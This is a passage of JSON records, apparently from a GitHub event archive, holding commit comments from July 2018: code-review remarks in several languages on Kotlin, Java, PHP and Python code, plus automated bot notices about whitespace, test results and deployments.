{"id":"7954381065","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29681079,"position":32,"line":48,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"0817a70a3670e8a60489e15bd8a222462a94a0ba","created_at":"2018-07-12T07:17:56Z","updated_at":"2018-07-12T07:17:56Z","author_association":"COLLABORATOR","body":"name 과 price도 굳이 여기서 nullable로 선언될 필요가 없어보입니다 ."}},"created_at":"2018-07-12T07:17:56Z"}
{"id":"7954383503","type":"CommitCommentEvent","actor":{"login":"1HasCode"},"repo":{"name":"1HasCode/HelloWorld"},"payload":{"comment":{"id":29681086,"position":null,"line":null,"path":null,"commit_id":"d5c8ec69f84b602e3b3cf0a22c1763476c017f43","created_at":"2018-07-12T07:18:31Z","updated_at":"2018-07-12T07:18:31Z","author_association":"OWNER","body":"555"}},"created_at":"2018-07-12T07:18:31Z"}
{"id":"7954385529","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29681092,"position":45,"line":56,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"0817a70a3670e8a60489e15bd8a222462a94a0ba","created_at":"2018-07-12T07:19:01Z","updated_at":"2018-07-12T07:19:01Z","author_association":"COLLABORATOR","body":"에러처리를 위해 publishProgress를 사용하는 것은 올바르지 못한 사용법입니다.\r\nonPostExecute에서 에러처리를 해주세요"}},"created_at":"2018-07-12T07:19:01Z"}
{"id":"7954387078","type":"CommitCommentEvent","actor":{"login":"chirpy2291"},"repo":{"name":"Igosuki/druid"},"payload":{"comment":{"id":29681097,"position":null,"line":null,"path":null,"commit_id":"7435372ad2afce855a44a950060bf1a30ed5570f","created_at":"2018-07-12T07:19:24Z","updated_at":"2018-07-12T07:19:24Z","author_association":"NONE","body":"Hi.\r\n\r\nHow do we pass userid /url/password?\r\n"}},"created_at":"2018-07-12T07:19:24Z"}
{"id":"7954388088","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29681102,"position":45,"line":56,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"0817a70a3670e8a60489e15bd8a222462a94a0ba","created_at":"2018-07-12T07:19:39Z","updated_at":"2018-07-12T07:19:39Z","author_association":"COLLABORATOR","body":"또한 요구 사항은 '메소드명 에러 발생' 이었습니다. 예를들어 'getName 에러 발생' 같은식으로요"}},"created_at":"2018-07-12T07:19:39Z"}
{"id":"7954389272","type":"CommitCommentEvent","actor":{"login":"GaurangTandon"},"repo":{"name":"soscripted/sox"},"payload":{"comment":{"id":29681106,"position":5,"line":4,"path":"sox.user.js","commit_id":"22492af8a9fc26745eeee55b619c245d14d6f0d6","created_at":"2018-07-12T07:19:56Z","updated_at":"2018-07-12T07:19:56Z","author_association":"NONE","body":"Sure, and thanks for the \"@contributor\" mention. I appreciate that :)"}},"created_at":"2018-07-12T07:19:56Z"}
{"id":"7954390027","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681109,"position":null,"line":null,"path":null,"commit_id":"aae6ff442402b71e9865dfa64d5a0f145f71bb18","created_at":"2018-07-12T07:20:07Z","updated_at":"2018-07-12T07:20:07Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/ajax.js, libraries/classes/Plugins/Auth/AuthenticationCookie.php"}},"created_at":"2018-07-12T07:20:07Z"}
{"id":"7954390155","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681112,"position":null,"line":null,"path":null,"commit_id":"3a52e205590479cd4c623e42188e2836e49addfe","created_at":"2018-07-12T07:20:09Z","updated_at":"2018-07-12T07:20:09Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/ajax.js"}},"created_at":"2018-07-12T07:20:09Z"}
{"id":"7954390298","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681114,"position":null,"line":null,"path":null,"commit_id":"568bc133cb646eec020203a11bed7b5fa634523c","created_at":"2018-07-12T07:20:10Z","updated_at":"2018-07-12T07:20:10Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: themes/pmahomme/css/common.css.php"}},"created_at":"2018-07-12T07:20:10Z"}
{"id":"7954390516","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29681115,"position":null,"line":null,"path":null,"commit_id":"5fd4a006eeab72df8ecd1e28c6f5f3f2f385c41e","created_at":"2018-07-12T07:20:13Z","updated_at":"2018-07-12T07:20:13Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: libraries/classes/Plugins/Auth/AuthenticationCookie.php"}},"created_at":"2018-07-12T07:20:13Z"}
{"id":"7954401512","type":"CommitCommentEvent","actor":{"login":"circuuz"},"repo":{"name":"triggerfishab/uniflex"},"payload":{"comment":{"id":29681148,"position":5,"line":16,"path":"wp-content/themes/uniflex/templates/single/job.php","commit_id":"1a51b9af5423383d9c011739c6231e0d5d65da85","created_at":"2018-07-12T07:22:47Z","updated_at":"2018-07-12T07:22:47Z","author_association":"MEMBER","body":"Använd rätt escaping funktion. `esc_attr()` ska användas för html attribut. I html ska `esc_html()` användas.\r\nhttps://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/#escaping-securing-output"}},"created_at":"2018-07-12T07:22:47Z"}
{"id":"7954402894","type":"CommitCommentEvent","actor":{"login":"LouisonGitzinger"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29681152,"position":21,"line":21,"path":"scrapper/management/commands/is_rapper.py","commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-12T07:23:07Z","updated_at":"2018-07-12T07:23:07Z","author_association":"CONTRIBUTOR","body":"Prefer real tuple data structure in this case `()` instead of a list `[]`\r\n```\r\nis_rapper_tuple = (False, list())\r\n```\r\n\r\nNB : if we init the `is_rapper` value to False, there is no need to set a `NullBooleanField` in our model"}},"created_at":"2018-07-12T07:23:07Z"}
{"id":"7954404346","type":"CommitCommentEvent","actor":{"login":"birozso"},"repo":{"name":"FiloSottile/mkcert"},"payload":{"comment":{"id":29681154,"position":null,"line":null,"path":null,"commit_id":"c3ffec658aefa67b3236356d6d1232bf9ec01284","created_at":"2018-07-12T07:23:26Z","updated_at":"2018-07-12T07:23:26Z","author_association":"NONE","body":"waiting for windows 10 version very much! It would make our life really easier eg. with SW. Great project, congrats!"}},"created_at":"2018-07-12T07:23:26Z"}
{"id":"7954427803","type":"CommitCommentEvent","actor":{"login":"dadbybad20"},"repo":{"name":"dadbybad20/hello-world"},"payload":{"comment":{"id":29681217,"position":null,"line":null,"path":null,"commit_id":"0b4b11570cb2e4526a63c66d021ef63cdaa17f46","created_at":"2018-07-12T07:28:40Z","updated_at":"2018-07-12T07:28:40Z","author_association":"OWNER","body":"Checkx"}},"created_at":"2018-07-12T07:28:40Z"}
{"id":"7954428431","type":"CommitCommentEvent","actor":{"login":"74Max79"},"repo":{"name":"74Niki79/Unity-Help"},"payload":{"comment":{"id":29681219,"position":null,"line":null,"path":null,"commit_id":"0dfad80e02d45ab95fca388b075e1a876f2e0d26","created_at":"2018-07-12T07:28:48Z","updated_at":"2018-07-12T07:28:48Z","author_association":"NONE","body":"prudnq"}},"created_at":"2018-07-12T07:28:48Z"}
{"id":"7954428769","type":"CommitCommentEvent","actor":{"login":"LouisonGitzinger"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29681221,"position":4,"line":5,"path":"scrapper/management/commands/rawartist_to_artist.py","commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-12T07:28:53Z","updated_at":"2018-07-12T07:28:53Z","author_association":"CONTRIBUTOR","body":"This shouldn't be repeated across files.\r\n"}},"created_at":"2018-07-12T07:28:53Z"}
{"id":"7954430687","type":"CommitCommentEvent","actor":{"login":"dadbybad20"},"repo":{"name":"dadbybad20/hello-world"},"payload":{"comment":{"id":29681228,"position":null,"line":null,"path":null,"commit_id":"0b4b11570cb2e4526a63c66d021ef63cdaa17f46","created_at":"2018-07-12T07:29:19Z","updated_at":"2018-07-12T07:29:19Z","author_association":"OWNER","body":"0b4b11570cb2e4526a63c66d021ef63cdaa17f46"}},"created_at":"2018-07-12T07:29:19Z"}
{"id":"7954431964","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681232,"position":11,"line":11,"path":"src/Zad1.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:29:37Z","updated_at":"2018-07-12T07:29:37Z","author_association":"COLLABORATOR","body":"zachowuj jakieś odstępy, przydałby się tutaj enter"}},"created_at":"2018-07-12T07:29:37Z"}
{"id":"7954432886","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681234,"position":12,"line":12,"path":"src/Zad1.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:29:50Z","updated_at":"2018-07-12T07:29:50Z","author_association":"COLLABORATOR","body":"pamiętaj o formatowaniu kodu"}},"created_at":"2018-07-12T07:29:50Z"}
{"id":"7954434572","type":"CommitCommentEvent","actor":{"login":"LouisonGitzinger"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29681241,"position":6,"line":7,"path":"scrapper/management/commands/rawartist_to_artist.py","commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-12T07:30:12Z","updated_at":"2018-07-12T07:30:12Z","author_association":"CONTRIBUTOR","body":"idem"}},"created_at":"2018-07-12T07:30:12Z"}
{"id":"7954436002","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681247,"position":16,"line":16,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:30:30Z","updated_at":"2018-07-12T07:30:30Z","author_association":"COLLABORATOR","body":"sc, sc2 ? Nazwy bardzo mało mówiące, wprowadzające wręcz w błąd "}},"created_at":"2018-07-12T07:30:30Z"}
{"id":"7954436072","type":"CommitCommentEvent","actor":{"login":"Meretto"},"repo":{"name":"Sauler/FlaxAPI"},"payload":{"comment":{"id":29681248,"position":null,"line":null,"path":null,"commit_id":"27ed5ca01bdf2170d54aadfc27beae5226c3b3c8","created_at":"2018-07-12T07:30:31Z","updated_at":"2018-07-12T07:30:31Z","author_association":"NONE","body":"Tested, work fine ;)"}},"created_at":"2018-07-12T07:30:31Z"}
{"id":"7954438751","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681253,"position":17,"line":17,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:31:08Z","updated_at":"2018-07-12T07:31:08Z","author_association":"COLLABORATOR","body":"Tak w ogóle nie potrzebujesz tutaj dwóch scannerów "}},"created_at":"2018-07-12T07:31:08Z"}
{"id":"7954438781","type":"CommitCommentEvent","actor":{"login":"lapido"},"repo":{"name":"lapido/AssetVerificationAPP"},"payload":{"comment":{"id":29681254,"position":null,"line":null,"path":null,"commit_id":"ea9d34a501133f4a17d3bf492aee121761c2cdb2","created_at":"2018-07-12T07:31:08Z","updated_at":"2018-07-12T07:31:08Z","author_association":"OWNER","body":"-changing DB details"}},"created_at":"2018-07-12T07:31:08Z"}
{"id":"7954439807","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681256,"position":19,"line":19,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:31:21Z","updated_at":"2018-07-12T07:31:21Z","author_association":"COLLABORATOR","body":"Co to jest a?"}},"created_at":"2018-07-12T07:31:21Z"}
{"id":"7954442757","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681258,"position":33,"line":33,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:32:00Z","updated_at":"2018-07-12T07:32:00Z","author_association":"COLLABORATOR","body":"liczbaA, liczbaB nic to nie mówi..."}},"created_at":"2018-07-12T07:32:00Z"}
{"id":"7954446453","type":"CommitCommentEvent","actor":{"login":"adrianhfoster"},"repo":{"name":"UnisaProject/UnisaMyAdmin"},"payload":{"comment":{"id":29681271,"position":52,"line":38,"path":"myadmin-service-impls/student-services/src/main/java/za/ac/unisa/myadmin/student/services/controllers/StudentRestServiceImpl.java","commit_id":"895006e6d045857e18c4bc884575a501ae86d3a9","created_at":"2018-07-12T07:32:50Z","updated_at":"2018-07-12T07:32:50Z","author_association":"COLLABORATOR","body":"@jannie-louwrens Single string just the \"conversation\" way of naming it I guess. Agree there could be confusion will rename.\r\n\r\nMeant to ask about the date param @DateTimeFormat(pattern = \"yyyy-MM-dd\") Date dateOfBirth\r\nThe string/date does not deserialize without this @DateTimeFormat annotation. Not sure if you've come across another way to handle?\r\n"}},"created_at":"2018-07-12T07:32:50Z"}
{"id":"7954447032","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681272,"position":41,"line":41,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:32:57Z","updated_at":"2018-07-12T07:32:57Z","author_association":"COLLABORATOR","body":"Wyświetlasz coś... nie wiadomo co :)"}},"created_at":"2018-07-12T07:32:57Z"}
{"id":"7954447305","type":"CommitCommentEvent","actor":{"login":"circuuz"},"repo":{"name":"triggerfishab/uniflex"},"payload":{"comment":{"id":29681274,"position":11,"line":82,"path":"wp-content/themes/uniflex/functions.php","commit_id":"57d6590ffa39337d1ef4c565fcae3233e480b6b3","created_at":"2018-07-12T07:33:01Z","updated_at":"2018-07-12T07:33:01Z","author_association":"MEMBER","body":"Användningen av `filter_input()` här blir förvirrande för andra utvecklare. `isset()` eller `! empty()` kan med fördel användas istället.\r\nTänk även på indenteringen vid användning av multiline ternary operators.\r\n"}},"created_at":"2018-07-12T07:33:01Z"}
{"id":"7954447973","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681276,"position":46,"line":46,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:33:11Z","updated_at":"2018-07-12T07:33:11Z","author_association":"COLLABORATOR","body":"enter"}},"created_at":"2018-07-12T07:33:11Z"}
{"id":"7954448804","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681278,"position":50,"line":50,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:33:21Z","updated_at":"2018-07-12T07:33:21Z","author_association":"COLLABORATOR","body":"To samo"}},"created_at":"2018-07-12T07:33:21Z"}
{"id":"7954449815","type":"CommitCommentEvent","actor":{"login":"karthikiyengar"},"repo":{"name":"evilsoft/crocks"},"payload":{"comment":{"id":29681279,"position":31,"line":117,"path":"docs/src/pages/docs/crocks/Pair.md","commit_id":"a384ab7191db5a89f049767b57ee95d4cfc17d8a","created_at":"2018-07-12T07:33:35Z","updated_at":"2018-07-12T07:33:35Z","author_association":"COLLABORATOR","body":"Living on the edge with find and replace 😄 "}},"created_at":"2018-07-12T07:33:35Z"}
{"id":"7954450677","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681282,"position":53,"line":53,"path":"src/Zad2.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:33:47Z","updated_at":"2018-07-12T07:33:47Z","author_association":"COLLABORATOR","body":"Nie musisz tworzyć tylu zmiennych... postaraj się zoptymalizować to zadanie "}},"created_at":"2018-07-12T07:33:47Z"}
{"id":"7954452288","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681285,"position":19,"line":19,"path":"src/Zad3.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:34:09Z","updated_at":"2018-07-12T07:34:09Z","author_association":"COLLABORATOR","body":"nie zaczyna się nazwy zmiennych od wielkiej litery.. "}},"created_at":"2018-07-12T07:34:09Z"}
{"id":"7954453178","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681286,"position":22,"line":22,"path":"src/Zad3.java","commit_id":"b80a211093bf990b10c916e9294bc233b198af6c","created_at":"2018-07-12T07:34:21Z","updated_at":"2018-07-12T07:34:21Z","author_association":"COLLABORATOR","body":"formatuj kod "}},"created_at":"2018-07-12T07:34:21Z"}
{"id":"7954453927","type":"CommitCommentEvent","actor":{"login":"TKaiC666"},"repo":{"name":"stratisproject/FederatedSidechains"},"payload":{"comment":{"id":29681290,"position":null,"line":null,"path":null,"commit_id":"3ccf5da679269b56b4bbb6910ca531eb13cdfad5","created_at":"2018-07-12T07:34:31Z","updated_at":"2018-07-12T07:34:31Z","author_association":"NONE","body":"Hi,this Mainchain Federation Address can't be used."}},"created_at":"2018-07-12T07:34:31Z"}
{"id":"7954456101","type":"CommitCommentEvent","actor":{"login":"blackonblack"},"repo":{"name":"Open-EnvironmentInformation/GroupProject"},"payload":{"comment":{"id":29681291,"position":null,"line":null,"path":null,"commit_id":"e4188eed64c860c3789c96a05fc4ecd91df58938","created_at":"2018-07-12T07:35:00Z","updated_at":"2018-07-12T07:35:00Z","author_association":"CONTRIBUTOR","body":"d"}},"created_at":"2018-07-12T07:35:00Z"}
{"id":"7954456449","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681292,"position":10,"line":10,"path":"src/Zad4.java","commit_id":"b2e5e4ca917377953465dca5ecce9147f1af53e5","created_at":"2018-07-12T07:35:06Z","updated_at":"2018-07-12T07:35:06Z","author_association":"COLLABORATOR","body":"istnieją też inne pętle ... :)"}},"created_at":"2018-07-12T07:35:06Z"}
{"id":"7954457933","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681295,"position":9,"line":9,"path":"src/Zad4.java","commit_id":"b2e5e4ca917377953465dca5ecce9147f1af53e5","created_at":"2018-07-12T07:35:28Z","updated_at":"2018-07-12T07:35:28Z","author_association":"COLLABORATOR","body":"nie deklaruje się tak zmiennych w jednej lini.. "}},"created_at":"2018-07-12T07:35:28Z"}
{"id":"7954459596","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681296,"position":12,"line":12,"path":"src/Zad4.java","commit_id":"b2e5e4ca917377953465dca5ecce9147f1af53e5","created_at":"2018-07-12T07:35:48Z","updated_at":"2018-07-12T07:35:48Z","author_association":"COLLABORATOR","body":"w każdej iteracji pętli tworzysz nowy obiekt, bardzo mało wydajne rozwiązanie "}},"created_at":"2018-07-12T07:35:48Z"}
{"id":"7954461149","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681302,"position":16,"line":16,"path":"src/Zad4.java","commit_id":"b2e5e4ca917377953465dca5ecce9147f1af53e5","created_at":"2018-07-12T07:36:10Z","updated_at":"2018-07-12T07:36:10Z","author_association":"COLLABORATOR","body":"Jest komunikat, wiadomo co się dzieje 👍 "}},"created_at":"2018-07-12T07:36:10Z"}
{"id":"7954462390","type":"CommitCommentEvent","actor":{"login":"martinlippert"},"repo":{"name":"spring-projects/sts4"},"payload":{"comment":{"id":29681304,"position":null,"line":null,"path":null,"commit_id":"2342dc8d3bfb974291883d9ed6a7a1be369b1567","created_at":"2018-07-12T07:36:27Z","updated_at":"2018-07-12T07:36:27Z","author_association":"MEMBER","body":"Correct, the fix for the AnyEdit install issue was done in April for STS4, but wasn't backported into STS3, therefore it is missing in the STS 3.9.5 release. Working on that backport now."}},"created_at":"2018-07-12T07:36:27Z"}
{"id":"7954463245","type":"CommitCommentEvent","actor":{"login":"LouisonGitzinger"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29681311,"position":null,"line":null,"path":null,"commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-12T07:36:38Z","updated_at":"2018-07-12T07:36:38Z","author_association":"CONTRIBUTOR","body":"For now, we can keep a bit of logic in the file `rawartist_to_artist.py`. But it would be great to keep the logic and data processing functions in a separate module.\r\n\r\n`is_rapper` file should be deleted.\r\n\r\nThis has to be tested on the dev DB"}},"created_at":"2018-07-12T07:36:38Z"}
{"id":"7954463837","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681313,"position":16,"line":16,"path":"src/Zad5.java","commit_id":"19d560b31e7c68426f3b93602a60098d2dd47e3c","created_at":"2018-07-12T07:36:46Z","updated_at":"2018-07-12T07:36:46Z","author_association":"COLLABORATOR","body":"Jak nie wiesz jak używać kolekcji to tego nie rób.. miałeś jak już tutaj wykorzystać tablice "}},"created_at":"2018-07-12T07:36:46Z"}
{"id":"7954464223","type":"CommitCommentEvent","actor":{"login":"ChShersh"},"repo":{"name":"kowainik/summoner"},"payload":{"comment":{"id":29681314,"position":20,"line":455,"path":"src/Summoner/Template.hs","commit_id":"c803fa5955e8ab30a54f6e85cc0620ca7d40e1c4","created_at":"2018-07-12T07:36:50Z","updated_at":"2018-07-12T07:36:50Z","author_association":"MEMBER","body":"@adituv Turned that this option was broken. Missing `-` after `source`. Don't worry, @vrom911 will fix this."}},"created_at":"2018-07-12T07:36:50Z"}
{"id":"7954464472","type":"CommitCommentEvent","actor":{"login":"MendelMonteiro"},"repo":{"name":"Abc-Arbitrage/Zebus"},"payload":{"comment":{"id":29681315,"position":null,"line":null,"path":null,"commit_id":"acfe7ea467482821ec0768e6fa4d8e207854d344","created_at":"2018-07-12T07:36:53Z","updated_at":"2018-07-12T07:36:53Z","author_association":"MEMBER","body":"Awesome 👍 "}},"created_at":"2018-07-12T07:36:53Z"}
{"id":"7954465415","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681318,"position":19,"line":19,"path":"src/Zad5.java","commit_id":"19d560b31e7c68426f3b93602a60098d2dd47e3c","created_at":"2018-07-12T07:37:06Z","updated_at":"2018-07-12T07:37:06Z","author_association":"COLLABORATOR","body":"Brak: formatowanie, enterów"}},"created_at":"2018-07-12T07:37:06Z"}
{"id":"7954467976","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681324,"position":29,"line":29,"path":"src/Zad5.java","commit_id":"19d560b31e7c68426f3b93602a60098d2dd47e3c","created_at":"2018-07-12T07:37:41Z","updated_at":"2018-07-12T07:37:41Z","author_association":"COLLABORATOR","body":"nazwa argumentu bardzo słaba, do tej metody mogę włożyć każdą kolekcję .. "}},"created_at":"2018-07-12T07:37:41Z"}
{"id":"7954470486","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29681332,"position":10,"line":7,"path":"src/main/java/abc/ListUnitTaskResults.java","commit_id":"b47857448e48eff5e8d29ac20012341cd06faf97","created_at":"2018-07-12T07:38:16Z","updated_at":"2018-07-12T07:38:16Z","author_association":"COLLABORATOR","body":"Throw exceptions only where they will be used. I.e. use try/catch construction"}},"created_at":"2018-07-12T07:38:16Z"}
{"id":"7954470524","type":"CommitCommentEvent","actor":{"login":"ghassanmas"},"repo":{"name":"FACN4/KhanToDoList"},"payload":{"comment":{"id":29681333,"position":null,"line":null,"path":null,"commit_id":"d3402aa9a23166beaa6aaa35c0a28b14c1e8fcb8","created_at":"2018-07-12T07:38:16Z","updated_at":"2018-07-12T07:38:16Z","author_association":"NONE","body":"Please don't update the your master while reviewing your code #18"}},"created_at":"2018-07-12T07:38:16Z"}
{"id":"7954471063","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681335,"position":31,"line":31,"path":"src/Zad5.java","commit_id":"19d560b31e7c68426f3b93602a60098d2dd47e3c","created_at":"2018-07-12T07:38:24Z","updated_at":"2018-07-12T07:38:24Z","author_association":"COLLABORATOR","body":"po co rzutujesz w ogóle ?"}},"created_at":"2018-07-12T07:38:24Z"}
{"id":"7954473411","type":"CommitCommentEvent","actor":{"login":"vikasshankhyadhar"},"repo":{"name":"vikasshankhyadhar/GitFirstShow"},"payload":{"comment":{"id":29681338,"position":null,"line":null,"path":null,"commit_id":"b1861d89de4b5d784ed6f3dd2110c2b54f437d02","created_at":"2018-07-12T07:38:57Z","updated_at":"2018-07-12T07:38:57Z","author_association":"OWNER","body":"Write Full name"}},"created_at":"2018-07-12T07:38:57Z"}
{"id":"7954478553","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29681348,"position":61,"line":43,"path":"src/main/java/abc/University.java","commit_id":"b47857448e48eff5e8d29ac20012341cd06faf97","created_at":"2018-07-12T07:40:08Z","updated_at":"2018-07-12T07:40:08Z","author_association":"COLLABORATOR","body":"Here I expect to return University type in signature"}},"created_at":"2018-07-12T07:40:08Z"}
{"id":"7954481095","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29681355,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-12T07:40:39Z","updated_at":"2018-07-12T07:40:39Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1678 of 1678 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.35%25-green.png)</a>\n"}},"created_at":"2018-07-12T07:40:39Z"}
{"id":"7954485227","type":"CommitCommentEvent","actor":{"login":"kheymann"},"repo":{"name":"kheymann/sample-cloud-native-toolchain-tutorial-20180711095018056"},"payload":{"comment":{"id":29681360,"position":null,"line":null,"path":null,"commit_id":"3a05fe24bccc4de63d7e71c7323f016d79143dfc","created_at":"2018-07-12T07:41:33Z","updated_at":"2018-07-12T07:41:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4295545d-7c62-4e10-ba0d-abbafb106524?env_id=ibm%3Ayp%3Aeu-de \"cloud-native-toolchain-tutorial-20180711095018056\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e36d8f9d-907a-4e06-913a-ecf3e7bc1d6e?env_id=ibm%3Ayp%3Aeu-de \"sample-cloud-native-toolchain-tutorial-20180711095018056\") deployed [sample-cloud-native-toolchain-tutorial-20180711095018056](https://github.com/kheymann/sample-cloud-native-toolchain-tutorial-20180711095018056/releases/tag/deploy-ibm-yp-eu-de-Katrin.Heymann_org-test-20180712-074131 \"deploy-ibm-yp-eu-de-Katrin.Heymann_org-test-20180712-074131\") to 